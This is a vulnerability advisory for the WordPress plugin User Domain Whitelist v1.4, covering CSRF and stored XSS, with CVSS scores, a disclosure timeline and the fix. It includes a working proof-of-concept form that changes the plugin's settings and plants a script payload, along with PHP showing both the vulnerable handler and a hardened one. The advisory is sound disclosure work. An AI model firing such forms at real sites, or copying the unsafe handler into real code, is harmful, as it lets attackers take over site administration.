Advisory: XSS and CSRF in User Domain Whitelist v1.4

Vulnerability

Last revised:

Contains a CSRF vulnerability which would allow anybody to create a page which, when visited by a logged-in admin user, could set any options within the plugin (thus allowing the plugin’s access control to be circumvented).

Contains a stored XSS vulnerability which would allow anybody to create a page which, when visited by a logged-in admin, would give the attacker full access to do anything the admin user can do within the admin interface.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability

  • Score: 5.8 (Medium)
  • Access Vector: Network
  • Access Complexity: Medium
  • Authentication: None
  • Confidentiality Impact: Partial
  • Integrity Impact: Partial
  • Availability Impact: None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Here’s a simple form which switches the mode to blacklist, which would allow anybody to register (assuming it was previously in whitelist mode). It also stores an XSS payload which is displayed to the admin user on that visit and on every subsequent visit to the settings page.

<form action="http://localhost/wp-admin/options-general.php?page=user-domain-whitelist.php" method="POST">
  <input type="text" name="update_HMUserDomainWhitelist" value="1">
  <input type="text" name="mode" value="black">
  <input type="text" name="domain_whitelist" value="&lt;/textarea>&lt;script>alert(1)&lt;/script>">
  <input type="submit">
</form>

Once the admin is cajoled into visiting a link of the attacker’s choosing (via spearphishing, perhaps), no further user interaction is required, as the form can be submitted on page load with JavaScript.

Advisory timeline

  • Discovered: 2013-10-09
  • Reported to author: 2014-02-19
  • Reported as fixed by the author: 2014-02-22
  • Published: 2014-03-17

Mitigation/further actions

Update to version 1.5.
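For plugin authors, the pattern that closes both issues in the proof of concept above is a capability check plus a WordPress nonce on the options POST (defeating the cross-site form) and escaping the stored value on output (defeating the stored XSS). The code below is an added illustration, not the plugin’s own code; the option key and function names are assumptions, while the field names follow the advisory’s form.

```php
<?php
// Added illustrative example, not the plugin's own code. Option key and function
// names are assumptions; field names match the advisory's proof-of-concept form.

// Unsafe shape the PoC relies on: no nonce or capability check, raw echo of input.
function udw_settings_page_unsafe() {
    if ( isset( $_POST['update_HMUserDomainWhitelist'] ) ) {       // any cross-site POST lands here (CSRF)
        update_option( 'udw_settings', array(
            'mode'             => $_POST['mode'],
            'domain_whitelist' => $_POST['domain_whitelist'],     // stored verbatim
        ) );
    }
    $o = get_option( 'udw_settings' );
    // "</textarea><script>alert(1)</script>" closes the textarea and runs (stored XSS)
    echo '<textarea name="domain_whitelist">' . $o['domain_whitelist'] . '</textarea>';
}

// Hardened shape: capability check, nonce, server-side validation, escaped output.
function udw_settings_page_safe() {
    if ( isset( $_POST['update_HMUserDomainWhitelist'] ) ) {
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient privileges.' );
        }
        // The nonce is issued only in the form WordPress rendered for this user;
        // a form on a third-party page cannot supply it, so the request dies here.
        check_admin_referer( 'udw_update_settings', 'udw_nonce' );
        $mode = ( isset( $_POST['mode'] ) && 'black' === $_POST['mode'] ) ? 'black' : 'white';
        $raw  = sanitize_textarea_field( wp_unslash( $_POST['domain_whitelist'] ?? '' ) );
        $list = array_filter( array_map( 'trim', explode( "\n", $raw ) ) );
        update_option( 'udw_settings', array(
            'mode'             => $mode,
            'domain_whitelist' => implode( "\n", $list ),
        ) );
    }
    $o = get_option( 'udw_settings', array( 'mode' => 'white', 'domain_whitelist' => '' ) );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'udw_update_settings', 'udw_nonce' ); ?>
        <input type="hidden" name="update_HMUserDomainWhitelist" value="1">
        <select name="mode">
            <option value="white" <?php selected( $o['mode'], 'white' ); ?>>whitelist</option>
            <option value="black" <?php selected( $o['mode'], 'black' ); ?>>blacklist</option>
        </select>
        <!-- esc_textarea() turns a stored "</textarea><script>" into inert text -->
        <textarea name="domain_whitelist"><?php echo esc_textarea( $o['domain_whitelist'] ); ?></textarea>
        <input type="submit" value="Save">
    </form>
    <?php
}
```

With the hardened handler, the advisory’s form fails at check_admin_referer() before any option is written, and even a value already stored from the vulnerable version is rendered as literal text rather than markup.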